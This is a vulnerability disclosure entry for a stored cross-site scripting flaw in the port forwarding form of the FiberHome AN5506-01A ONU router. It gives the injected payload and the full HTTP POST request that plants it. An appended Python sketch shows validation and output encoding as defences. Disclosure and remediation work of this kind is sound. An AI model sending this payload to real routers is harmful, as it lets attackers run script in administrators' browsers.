Submission #501365: FiberHome AN5506-01A ONU GPON RP2511 Cross Site Scripting (info)

Title: FiberHome AN5506-01A ONU GPON RP2511 Cross Site Scripting
Description: A Cross-site Scripting (XSS) vulnerability was found in the ONU model AN5506-01A application and management. To carry out the attack, it is necessary to access the "Application" menu and select the "Port forwarding" submenu. In the "Add" function, there is an input field for entering a description to be added to the port forwarding. The affected field is "Description". In this field, it is possible to inject a Cross-Site Scripting script.

Script: <img src="" onerror="prompt(8)">

Request:

POST /goform/portForwardingCfg HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 227
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://xx.xx.xx.xx
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xx.xx.xx.xx/application/port_forwarding.asp
Accept-Encoding: gzip, deflate, br
Cookie: loginName=admin
Connection: keep-alive

pf_WAN=0&pf_Description=%3Cimg+src%3D%22%22+onerror%3D%22prompt%288%29%22%3E&pf_PubPortStart=80&pf_PubPortEnd=8080&pf_IP=192.168.1.1&pf_PriPortStart=8090&pf_PriPortEnd=8091&pf_protocol=3&pf_enable=0&pf_apply=Apply&fw_curIndex=0
Source: ⚠️ http://x.x.x.x/login.html
User: Havook (UID 71104)
Submitted: 2025-02-14 18:24 (1 year ago)
Moderation: 2025-02-23 08:14 (9 days later)
Status: Accepted
VulDB entry: 296604 [FiberHome AN5506-01A ONU GPON RP2511 Port Forwarding Submenu portForwardingCfg pf_Description cross site scripting]
Points: 17
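
Added example, not part of the submission and not FiberHome code: a sketch of the two server-side controls that address this class of issue for the port forwarding form, input validation on save and HTML encoding on output, run against the request body shown above. The function names, the benign comparison body and the description policy (plain label, at most 32 characters) are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Request body copied from the submission's POST to /goform/portForwardingCfg.
SUBMITTED_BODY = (
    "pf_WAN=0&pf_Description=%3Cimg+src%3D%22%22+onerror%3D%22prompt%288%29%22%3E"
    "&pf_PubPortStart=80&pf_PubPortEnd=8080&pf_IP=192.168.1.1"
    "&pf_PriPortStart=8090&pf_PriPortEnd=8091&pf_protocol=3&pf_enable=0"
    "&pf_apply=Apply&fw_curIndex=0"
)
# Constructed benign request for comparison (not from the submission).
BENIGN_BODY = SUBMITTED_BODY.replace(
    "%3Cimg+src%3D%22%22+onerror%3D%22prompt%288%29%22%3E", "web+server")

# Assumed policy: short plain-text label, no markup characters.
DESCRIPTION_RE = re.compile(r"[A-Za-z0-9 _.\-]{1,32}")
PORT_PAIRS = (("pf_PubPortStart", "pf_PubPortEnd"),
              ("pf_PriPortStart", "pf_PriPortEnd"))


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into {name: value}."""
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}


def validate_rule(fields):
    """Return the names of fields that fail server-side validation."""
    bad = []
    if not DESCRIPTION_RE.fullmatch(fields.get("pf_Description", "")):
        bad.append("pf_Description")
    for start, end in PORT_PAIRS:
        lo, hi = fields.get(start, ""), fields.get(end, "")
        # isascii() keeps non-ASCII digits away from int().
        ok = all(p.isascii() and p.isdigit() for p in (lo, hi))
        if not (ok and 1 <= int(lo) <= int(hi) <= 65535):
            bad.extend([start, end])
    return bad


def render_description(value):
    """HTML-encode a stored description for element or attribute context."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for body in (SUBMITTED_BODY, BENIGN_BODY):
        f = parse_form(body)
        print(validate_rule(f), render_description(f["pf_Description"]))
```

Validation alone does not cover entries already stored on the device, so the output encoding step is the one that has to be applied wherever the description is rendered.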
